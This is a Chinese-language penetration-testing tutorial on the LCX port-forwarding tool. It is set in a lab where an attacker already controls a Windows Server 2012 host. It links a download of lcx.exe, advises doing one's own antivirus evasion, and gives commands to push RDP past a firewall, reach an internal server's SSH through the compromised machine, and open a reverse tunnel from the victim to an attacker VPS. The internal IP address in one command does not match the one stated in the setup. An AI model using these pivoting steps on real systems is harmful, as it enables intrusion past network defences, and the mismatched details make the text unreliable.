LCX是一款十分经典的内网端口转发工具，基于Socket套接字，具有端口转发和端口映射的功能。但是目前很多杀软已经将其加入了特征库，在实际利用的时候需要自行做免杀处理。

lcx有三个功能：

1. 第一个功能将本地端口转发到本地另一个端口上

2. 第二个功能将本地端口准发到其他主机某个端口上（端口映射）

3. 第三个功能是进行监听并进行转发使用

下载 —> 链接：lcx.exe , 提取码：fn9o

将本地端口转发到本地另一个端口

测试环境如图，假设右侧的win2012是一个具有公网ip地址的web服务器。左侧的win11为测试人员的主机。

攻击者此时已获取了win2012的控制权，需要登录远程桌面查看情况，但是防火墙对3389做了限制，不允许外网机器对3389进行连接。那么，通过端口转发，可以将3389端口转发到其他防火墙允许的端口上，如8000端口（注意，这个端口需没被使用）。

在win2012上执行以下命令

lcx.exe -tran 8000 127.0.0.1 3389

然后通过连接目标的8000端口就可以成功访问远程桌面

将其他主机端口映射到本地主机某个端口

测试环境如下，右侧的web服务器win2012为双网卡分别模拟外网（192.168.10.2）和内网（192.168.43.142）。内网还存在一台mysql服务器。最左侧的win11为攻击机。

假设已获取了win2012的控制权，经过信息收集获得内网主机mysql服务器的ssh登录凭据，接下来需要登录这台服务器。但是由于mysql服务器位于内网，无法直接通过ip地址连接，所以需要通过端口映射，将mysql服务器的22端口映射到win2012上。

win2012上执行以下命令，将mysql的22端口，映射到win2012的8000端口上

lcx.exe -tran 8000 192.168.48.142 22

然后通过连接win2012的8000端口，即可访问内网mysql的ssh

ssh root@192.168.10.2 -p 8000

目标主机无公网ip

如下，右侧的web服务无公网ip地址，通过NAT对外提供web服务。假设已获取了win2012的控制权，需要登录其远程桌面查看情况，但是win2012无公网ip，无法直接通过ip地址进行访问，所以需要公网vps监听一个端口，将win2012的3389端口转发到vps这个端口上。

1. vps执行如下命令，监听本地4444端口，并将8888端口上接收到的数据转发给本机的4444端口

lcx.exe -listen 4444 8888

2. win2012上执行如下命令，控制win2012去连接vps的8888端口

lcx.exe -slave 192.168.10.2 8888 127.0.0.1 3389

通过连接vps的4444端口，即可访问win2012的远程桌面